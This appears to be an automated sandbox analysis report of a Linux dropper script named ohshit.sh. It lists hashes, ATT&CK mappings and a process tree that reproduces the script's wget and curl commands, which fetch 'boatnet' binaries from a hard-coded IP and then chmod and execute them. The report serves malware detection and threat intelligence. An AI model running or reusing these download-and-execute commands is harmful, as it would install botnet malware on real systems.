f3e6052d4142e5a195e03e65d4a8acd2b7d6e790b6aacbc690ae909e7edb01f6

Analysis

max time kernel
149s
max time network
108s
platform
debian-9_mipsel
resource
debian9-mipsel-20240729-en
resource tags

arch:mipselimage:debian9-mipsel-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
09-02-2025 16:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ohshit.sh
Size

2KB
MD5

f0977aee35c9bf421f707b9bfba5d9f7
SHA1

5eacb3c68403f8f9c853f41914f27d5abc8645f5
SHA256

f3e6052d4142e5a195e03e65d4a8acd2b7d6e790b6aacbc690ae909e7edb01f6
SHA512

3184f088b0188b537c6a9ba0aa037c586d3267f17a11d4e6fbb65745b21dafbf37506e359dae372993fb6e28a06e3749b0b5a382901ac805cce83988772f53d9

Score

7^/10

defense_evasion discovery upx

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 2 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
785	chmod
791	chmod

Executes dropped EXE 2 IoCs

ioc	pid	Process
/tmp/WTF	786	ohshit.sh
/tmp/WTF	792	ohshit.sh

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral4/files/fstream-1.dat	upx
behavioral4/files/fstream-4.dat	upx

Reads runtime system information 2 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 3 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
788	wget
789	curl
790	cat

Writes file to tmp directory 6 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/boatnet.x86	wget
File opened for modification	/tmp/boatnet.x86	curl
File opened for modification	/tmp/WTF	ohshit.sh
File opened for modification	/tmp/boatnet.mips	wget
File opened for modification	/tmp/boatnet.mips	curl
File opened for modification	/tmp/boatnet.arc	wget

/tmp/ohshit.sh
/tmp/ohshit.sh
1⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:710
- /usr/bin/wget
  wget http://194.85.251.9/hiddenbin/boatnet.x86
  2⤵
  - Writes file to tmp directory
  PID:714
- /usr/bin/curl
  curl -O http://194.85.251.9/hiddenbin/boatnet.x86
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:733
- /bin/cat
  cat boatnet.x86
  2⤵
  PID:784
- /bin/chmod
  chmod +x boatnet.x86 ohshit.sh systemd-private-25cfef09d60348ebb2dd32362bf180f7-systemd-timedated.service-0Q9Ulh WTF
  2⤵
  - File and Directory Permissions Modification
  PID:785
- /tmp/WTF
  ./WTF
  2⤵
  PID:786
- /usr/bin/wget
  wget http://194.85.251.9/hiddenbin/boatnet.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:788
- /usr/bin/curl
  curl -O http://194.85.251.9/hiddenbin/boatnet.mips
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:789
- /bin/cat
  cat boatnet.mips
  2⤵
  - System Network Configuration Discovery
  PID:790
- /bin/chmod
  chmod +x boatnet.mips boatnet.x86 ohshit.sh systemd-private-25cfef09d60348ebb2dd32362bf180f7-systemd-timedated.service-0Q9Ulh WTF
  2⤵
  - File and Directory Permissions Modification
  PID:791
- /tmp/WTF
  ./WTF
  2⤵
  PID:792
- /usr/bin/wget
  wget http://194.85.251.9/hiddenbin/boatnet.arc
  2⤵
  - Writes file to tmp directory
  PID:794

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/WTF

Filesize
31KB

MD5
e26c06fcc3b3e46040e49ac9c0b68928

SHA1
2a631555a166c51b94f898506385fe3648eb14e5

SHA256
5232159e652b1445635ef83fb65f61290a253dd7184d329619998c10e0e9b744

SHA512
443ee05d75e7c4151b0e9f88e604118e160b440b3be7353243bdb2e499c745aa42378769d3de3517fa09672eeef1d35669d0ae78abedcb8f12f65ae011d824e6

Download Submit
/tmp/boatnet.x86

Filesize
29KB

MD5
8231c76be6663e62d7d5a8ea685ff498

SHA1
03177493e6a6d9e3b7aaca572245065ffcfe0575

SHA256
c45cbd5ce92e34f62bd3e1e19c36daf662860aac2a22a5d67924788acc71e3bc

SHA512
1a8eb5eaf84d38252f4535a2a89aca76fadf7854d218c6bca7ec2521ee485d9bd082e3eeff4ec981abaf0e18afc0eed7415ae656d3080b152fb7b35370caa9ac

Download Submit